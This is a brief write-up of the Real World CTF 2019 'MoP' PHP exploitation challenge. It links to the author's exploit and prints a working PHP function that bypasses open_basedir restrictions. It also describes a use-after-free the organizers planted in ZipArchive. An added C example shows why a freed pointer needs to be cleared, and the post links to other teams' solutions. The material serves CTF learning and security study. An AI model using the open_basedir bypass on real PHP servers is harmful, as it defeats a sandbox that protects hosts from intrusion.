Real World CTF 2019 Quals – MoP (PHP PWN [2])

You can find my exploit here.
https://gist.github.com/wupco/29f16a4936a599a243ea3c0f9c414e71

You can get the attachment here.
https://github.com/chaitin/Real-World-CTF-2019-Quals-Attachment/tree/master/184c379a6f90b9e3fcbbdf3f57d8a388

Additional Intro

  1. An old path to bypass open_basedir.

     function bypass_open_basedir(){
         if(!is_dir('/tmp/ab')){
             mkdir('/tmp/ab');
         }
         chdir('/tmp/ab');
         ini_set('open_basedir','..');
         chdir('..');
         chdir('..');
         chdir('..');
         chdir('..');
         ini_set('open_basedir','/');
     }

  2. Detect use-after-free in ZipArchive

I've deleted a line of zip.c (without assigning zero after efree).

  3. Exploit it.
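
Why the missing zero assignment after efree in the ZipArchive step matters, as an added example that is not code from the original post or from zip.c: it compares a free that leaves the stale pointer in place with one that clears it. The mock allocator, `struct archive` and all function names are assumptions made up for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Mock allocator, constructed for this example: slots are never handed back
   to the OS, so inspecting a stale pointer here is well-defined. */
enum { SLOTS = 4, SLOT_SIZE = 32 };
static char arena[SLOTS][SLOT_SIZE];
static int in_use[SLOTS];

static void *mock_alloc(void) {
    for (int i = 0; i < SLOTS; i++)
        if (!in_use[i]) { in_use[i] = 1; return arena[i]; }
    return NULL;
}
static void mock_free(void *p) {
    in_use[((char *)p - &arena[0][0]) / SLOT_SIZE] = 0;
}

struct archive { char *name; };   /* hypothetical object, not zip.c's struct */

/* Pattern from the post: the buffer is freed but the field keeps its address. */
static void close_buggy(struct archive *a) {
    if (a->name) mock_free(a->name);
}
/* Hardened pattern: clear the field so later paths see "no buffer". */
static void close_fixed(struct archive *a) {
    if (a->name) { mock_free(a->name); a->name = NULL; }
}

/* Close, let a second owner allocate, then close again (a later cleanup
   path). Bit 0: stale field aliases the new owner's memory.
   Bit 1: the second close released the new owner's live allocation. */
static int close_twice(void (*close_fn)(struct archive *)) {
    memset(in_use, 0, sizeof in_use);
    struct archive a = { mock_alloc() };
    close_fn(&a);
    char *other = mock_alloc();          /* allocator reuses the freed slot */
    int alias = (a.name == other);
    close_fn(&a);
    int other_freed = !in_use[(other - &arena[0][0]) / SLOT_SIZE];
    return alias | (other_freed << 1);
}

int main(void) {
    printf("buggy: %d, fixed: %d\n",
           close_twice(close_buggy), close_twice(close_fixed));
    return 0;
}
```

Reviewing a patch for this bug class comes down to checking that every free of a struct field is followed by clearing that field on all paths.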

Other awesome solutions

  1. libcurl heap overflow

https://blog.bushwhackers.ru/pwning-master-of-php-like-its-real-real-world-ctf/

  2. UAF on spl_dllist

https://github.com/junorouse/ctf/tree/master/2019/realworld/mop
